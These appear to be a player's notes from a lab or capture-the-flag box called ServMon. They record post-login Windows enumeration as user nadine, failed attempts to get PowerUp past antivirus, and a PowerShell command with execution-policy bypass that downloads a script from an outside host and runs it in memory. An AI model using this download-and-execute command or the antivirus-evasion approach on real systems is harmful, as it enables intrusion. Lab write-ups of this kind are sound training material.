4 box enum nadine
# some AV is blocking to write file, download files
# remotely running PowerUp.ps1 via IEX is failing.
| This script contains malicious content and has been blocked by your antivirus software.
nadine@SERVMON C:\inetpub>dir
Directory of C:\inetpub
08/04/2020 23:21 <DIR> .
08/04/2020 23:21 <DIR> ..
08/04/2020 23:09 <DIR> ftproot
14/01/2020 20:01 <DIR> logs
# nothing in ftproot
# looking for the same files as in ftp
nadine@SERVMON C:\>dir /b /s "Confidential.txt"
C:\Shared\Users\Nadine\Confidential.txt
# we can write files here.
# certutil.exe is failing; PS wget works
# PowerUp is failing due to AV checks
# win.exe is failing to execute.
# need to manual enum
# net user <>
| both nadine and nathan are just *USERS
| Administrator is in 'administrators' localgroup
# running Get-RemoteProgram.ps1
nadine@SERVMON C:\Shared\Users\Nadine>powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/Get-RemoteProgram
.ps1')
ComputerName ProgramName
------------ -----------
SERVMON VMware Tools
SERVMON NSClient++ (x64)
SERVMON Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
SERVMON Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29016
SERVMON Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29016
SERVMON NVMS-1000
SERVMON Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319
SERVMON Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.27.29016
SERVMON Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.27.29016
SERVMON Microsoft Visual C++ 2019 X86 Additional Runtime - 14.27.29016
SERVMON Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
SERVMON NVMS-1000
SERVMON Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.27.29016
SERVMON Microsoft OneDrive
Last updated